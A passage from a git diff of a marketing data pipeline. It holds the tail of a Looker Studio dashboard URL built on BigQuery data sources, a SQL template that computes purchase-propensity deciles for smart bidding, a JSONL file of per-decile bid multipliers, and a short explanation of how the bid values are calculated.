20x%20Conversions&ds.MAJ_resource_link.connector=bigQuery&ds.MAJ_resource_link.type=TABLE&ds.MAJ_resource_link.tableId=resource_link&ds.MAJ_resource_link.datasetId=maj_dashboard&ds.MAJ_resource_link.projectId=${monitor_project}&ds.MAJ_resource_link.datasourceName=MAJ%20Resource%20Link&ds.GA4_base_event.connector=bigQuery&ds.GA4_base_event.type=TABLE&ds.GA4_base_event.tableId=event&ds.GA4_base_event.datasetId=${mds_ga4_base_dataset}&ds.GA4_base_event.projectId=${mds_project}&ds.GA4_base_event.datasourceName=MDS%20GA4%20Base%20Event&ds.MDS_execution_log.connector=bigQuery&ds.MDS_execution_log.type=TABLE&ds.MDS_execution_log.tableId=${dataform_log_table_id}&ds.MDS_execution_log.datasetId=${logs_dataset}&ds.MDS_execution_log.projectId=${monitor_project}&ds.MDS_execution_log.datasourceName=MDS%20Execution%20Log&ds.Activation_log.connector=bigQuery&ds.Activation_log.type=TABLE&ds.Activation_log.tableId=${dataflow_log_table_id}&ds.Activation_log.datasetId=${logs_dataset}&ds.Activation_log.projectId=${monitor_project}&ds.Activation_log.datasourceName=Activation%20Execution%20Log&ds.Vertex_log.connector=bigQuery&ds.Vertex_log.type=TABLE&ds.Vertex_log.tableId=${vertex_pipelines_log_table_id}&ds.Vertex_log.datasetId=${logs_dataset}&ds.Vertex_log.projectId=${monitor_project}&ds.Vertex_log.datasourceName=Vertex%20AI%20Pipelines%20Log&ds.Aggregated_vbb_volume_dai
ly.connector=bigQuery&ds.Aggregated_vbb_volume_daily.type=TABLE&ds.Aggregated_vbb_volume_daily.tableId=aggregated_value_based_bidding_volume_daily&ds.Aggregated_vbb_volume_daily.datasetId=${aggregated_vbb_dataset}&ds.Aggregated_vbb_volume_daily.projectId=${feature_store_project}&ds.Aggregated_vbb_volume_daily.datasourceName=Aggregated%20VBB%20Volume%20Daily&ds.Aggregated_vbb_volume_weekly.connector=bigQuery&ds.Aggregated_vbb_volume_weekly.type=TABLE&ds.Aggregated_vbb_volume_weekly.tableId=aggregated_value_based_bidding_volume_weekly&ds.Aggregated_vbb_volume_weekly.datasetId=${aggregated_vbb_dataset}&ds.Aggregated_vbb_volume_weekly.projectId=${feature_store_project}&ds.Aggregated_vbb_volume_weekly.datasourceName=Aggregated%20VBB%20Volume%20Weekly&ds.Aggregated_vbb_correlation.connector=bigQuery&ds.Aggregated_vbb_correlation.type=TABLE&ds.Aggregated_vbb_correlation.tableId=aggregated_value_based_bidding_correlation&ds.Aggregated_vbb_correlation.datasetId=${aggregated_vbb_dataset}&ds.Aggregated_vbb_correlation.projectId=${feature_store_project}&ds.Aggregated_vbb_correlation.datasourceName=Aggregated%20VBB%20Correlation&ds.Aggregated_vbb_weights.connector=bigQuery&ds.Aggregated_vbb_weights.type=TABLE&ds.Aggregated_vbb_weights.tableId=vbb_weights&ds.Aggregated_vbb_weights.datasetId=${aggregated_vbb_dataset}&ds.Aggregated_vbb_weights.projectId=${feature_store_project}&ds.Aggregated_vbb_weights.datasourceName=Aggregated%20VBB%20Weights&ds.Aggregated_predictions.connector=bigQuery&ds.Aggregated_predictions.type=TABLE&ds.Aggregated_predictions.tableId=latest&ds.Aggregated_predictions.datasetId=${aggregated_predictions_dataset}&ds.Aggregated_predictions.projectId=${feature_store_project}&ds.Aggregated_predictions.datasourceName=Aggregated%20Predictions&ds.User_behaviour_revenue_insights_daily.connector=bigQuery&ds.User_behaviour_revenue_insights_daily.type=TABLE&ds.User_behaviour_revenue_insights_daily.tableId=user_behaviour_revenue_insights_daily&ds.User_behaviour_revenue_insights_daily.datasetId=${gemini_insights_dataset}&ds.User_behaviour_revenue_insights_daily.projectId=${feature_store_project}&ds.User_behaviour_revenue_insights_daily.datasourceName=User%20Behaviour%20Revenue%20Insights%20Daily&ds.Bid_strategy_roas_vbb.connector=bigQuery&ds.Bid_strategy_roas_vbb.type=TABLE&ds.Bid_strategy_roas_vbb.tableId=bid_strategy_roas&ds.Bid_strategy_roas_vbb.datasetId=${mds_ads_base_dataset}&ds.Bid_strategy_roas_vbb.projectId=${mds_project}&ds.Bid_strategy_roas_vbb.datasourceName=Bid%20Strategy%20ROAS%20VBB&ds.Prediction_stats.connector=bigQuery&ds.Prediction_stats.type=TABLE&ds.Prediction_stats.tableId=prediction_stats&ds.Prediction_stats.datasetId=${purchase_propensity_dataset}&ds.Prediction_stats.projectId=${feature_store_project}&ds.Prediction_stats.datasourceName=Prediction%20Stats \ No newline at end of file diff --git a/templates/purchase_propensity_smart_bidding_view.sql.tpl b/templates/purchase_propensity_smart_bidding_view.sql.tpl new file mode 100644 index 00000000..493a5e9b --- /dev/null +++ b/templates/purchase_propensity_smart_bidding_view.sql.tpl @@ -0,0 +1,41 @@ +-- Copyright 2024 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. 
+-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +SELECT + p_stat.inference_date, + p_stat.p_p_decile, + p_stat.number_of_users, + conf.value*p_stat.number_of_users AS predicted_purchase_value +FROM ( + SELECT + inference_date, + p_p_decile, + COUNT(p_p_decile) AS number_of_users + FROM ( + SELECT + PARSE_DATE('%Y_%m_%d', SUBSTR(_TABLE_SUFFIX, 1,10)) AS inference_date, + NTILE(10) OVER (PARTITION BY _TABLE_SUFFIX ORDER BY b.prediction_prob DESC) AS p_p_decile, + FROM + `${project_id}.${purchase_propensity_dataset}.predictions_*` b + WHERE + ENDS_WITH(_TABLE_SUFFIX, '_view') ) + GROUP BY + inference_date, + p_p_decile ) AS p_stat +JOIN + `${project_id}.${activation_dataset}.${smart_bidding_configuration_table}` conf +ON + p_stat.p_p_decile = decile +WHERE + conf.activation_type = 'purchase-propensity' \ No newline at end of file diff --git a/templates/vbb_activation_configuration.jsonl b/templates/vbb_activation_configuration.jsonl new file mode 100644 index 00000000..57b200e0 --- /dev/null +++ b/templates/vbb_activation_configuration.jsonl @@ -0,0 +1,3 @@ +{"activation_type":"purchase-propensity","value_norm":150,"decile_multiplier":[{"decile":1,"multiplier":5.5},{"decile":2,"multiplier":3},{"decile":3,"multiplier":2},{"decile":4,"multiplier":1},{"decile":5,"multiplier":0},{"decile":6,"multiplier":0},{"decile":7,"multiplier":0},{"decile":8,"multiplier":0},{"decile":9,"multiplier":0},{"decile":10,"multiplier":0}]} +{"activation_type":"cltv","value_norm":500,"decile_multiplier":[{"decile":1,"multiplier":5.5},{"decile":2,"multiplier":3},{"decile":3,"multiplier":2},{"decile":4,"multiplier":1},{"decile":5,"multiplier":0},{"decile":6,"multiplier":0},{"decile":7,"multiplier":0},{"decile":8,"multiplier":0},{"decile":9,"multiplier":0},{"decile":10,"multiplier":0}]} +{"activation_type":"lead-score-propensity","value_norm":150,"decile_multiplier":[{"decile":1,"multiplier":5.5},{"decile":2,"multiplier":3},{"decile":3,"multiplier":2},{"decile":4,"multiplier":1},{"decile":5,"multiplier":0},{"decile":6,"multiplier":0},{"decile":7,"multiplier":0},{"decile":8,"multiplier":0},{"decile":9,"multiplier":0},{"decile":10,"multiplier":0}]} \ No newline at end of file
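For reference, the value-based-bidding pieces above fit together as follows: load_vbb_activation_configuration.sql.tpl expands each entry of vbb_activation_configuration.jsonl into one row per (activation_type, decile) with value = value_norm * multiplier, and the *_vbb_query_template.sqlx queries join on decile and keep only rows with value > 0, sending that value to GA4 as event_param_value. The standalone BigQuery query below is a minimal sketch of that arithmetic for the purchase-propensity entry (value_norm = 150); it uses only literal values taken from the JSONL above and is not itself part of the diff.

-- Minimal sketch (illustrative only): per-decile conversion values for 'purchase-propensity'
-- (value_norm = 150), computed the same way load_vbb_activation_configuration.sql.tpl does.
SELECT
  'purchase-propensity' AS activation_type,
  decile,
  150 * multiplier AS value  -- value_norm * multiplier
FROM
  UNNEST(ARRAY<STRUCT<decile INT64, multiplier FLOAT64>>[
    (1, 5.5), (2, 3), (3, 2), (4, 1), (5, 0),
    (6, 0), (7, 0), (8, 0), (9, 0), (10, 0)
  ])
ORDER BY
  decile;
-- Yields 825, 450, 300 and 150 for deciles 1-4 and 0 for deciles 5-10, so only the top
-- four deciles are activated with a non-zero event_param_value.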